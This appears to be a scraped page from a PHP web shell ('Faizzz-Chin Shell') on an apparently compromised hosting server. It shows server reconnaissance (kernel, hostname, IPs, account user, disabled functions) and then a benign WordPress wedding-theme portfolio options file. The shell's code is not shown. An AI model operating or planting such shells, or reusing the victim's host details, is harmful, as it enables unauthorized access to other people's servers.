SHELL BYPASS 403 |
Modern UI. Responsive. Powerful.

Faizzz-Chin Shell

Uname\Kernel: Linux server.kxo.bgz.mybluehostin.me 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Server: Apache
PHP Version: 8.2.29 [ PHP INFO ]
Operating System: Linux
Server Ip: 162.240.163.222
Your Ip: 216.73.216.145
Date Time: 2025-07-12 05:32:46
User: dilseshaadi (1027) | Group: dilseshaadi (1027)
Safe Mode: OFF
Disable Function: exec,passthru,shell_exec,system

name : page_portfolio_options.php
<?php

return array(
	'id'          => 'ozy_wedding_planner_meta_page_portfolio',
	'types'       => array('page'),
	'title'       => esc_attr__('Portfolio Options', 'wedding-planner'),
	'priority'    => 'high',
	'template'    => array(
		array(
			'type' => 'notebox',
			'name' => 'ozy_wedding_planner_meta_page_portfolio_infobox',
			'label' => esc_attr__('Portfolio Options', 'wedding-planner'),
			'description' => esc_attr__('Below this point all the options are only works with portfolio template types.', 'wedding-planner'),
			'status' => 'info',
		),
		array(
			'type' => 'sorter',
			'name' => 'ozy_wedding_planner_meta_page_portfolio_category_sort',
			'label' => esc_attr__('Category Select / Order', 'wedding-planner'),
			'description' => esc_attr__('If you leave this field blank, all available categories will be listed. By this option, you can create multiple portfolio/gallery pages with different items.', 'wedding-planner'),			
			'default' => '{{all}}',
			'items' => array(
				'data' => array(
					array(
						'source' => 'function',
						'value' => 'vp_bind_ozy_wedding_planner_portfolio_categories_simple',
					),
				),
			),
		),	
		array(
			'type' => 'radiobutton',
			'name' => 'ozy_wedding_planner_meta_page_portfolio_order',
			'label' => esc_attr__('Item Order', 'wedding-planner'),
			'description' => esc_attr__('By selecting "Custom Order ..." you will have to set the order field of each of the items.', 'wedding-planner'),			
			'items' => array(
				array(
					'value' => 'date-desc',
					'label' => 'Date DESC',
				),
				array(
					'value' => 'date-asc',
					'label' => 'Date ASC',
				),
				array(
					'value' => 'menu_order-desc',
					'label' => 'Custom DESC',
				),
				array(
					'value' => 'menu_order-asc',
					'label' => 'Custom ASC',
				),
			),
			'default' => '{{first}}'
		),
		array(
			'type' => 'radiobutton',
			'name' => 'ozy_wedding_planner_meta_page_portfolio_column_count',
			'label' => esc_attr__('Column Count', 'wedding-planner'),
			'items' => array(
				array(
					'value' => '2',
					'label' => '2 Column',
				),array(
					'value' => '3',
					'label' => '3 Column',
				),
				array(
					'value' => '4',
					'label' => '4 Column',
				)
			),
			'default' => '2'
		),
		array(
			'type' => 'textbox',
			'name' => 'ozy_wedding_planner_meta_page_portfolio_hover_caption',
			'label' => esc_attr__('Hover Caption', 'wedding-planner'),
			'default' => esc_attr__('View their perfect day', 'wedding-planner'),
		),				
		array(
			'type' => 'textbox',
			'name' => 'ozy_wedding_planner_meta_page_portfolio_count',
			'label' => esc_attr__('Item Count Per Load', 'wedding-planner'),
			'description' => esc_attr__('How many portfolio item will be loaded for each load.', 'wedding-planner'),
			'default' => '32',
			'validation' => 'numeric',
		),			
	),	
);

/**
 * EOF
 */
© 2025 Faizzz-Chin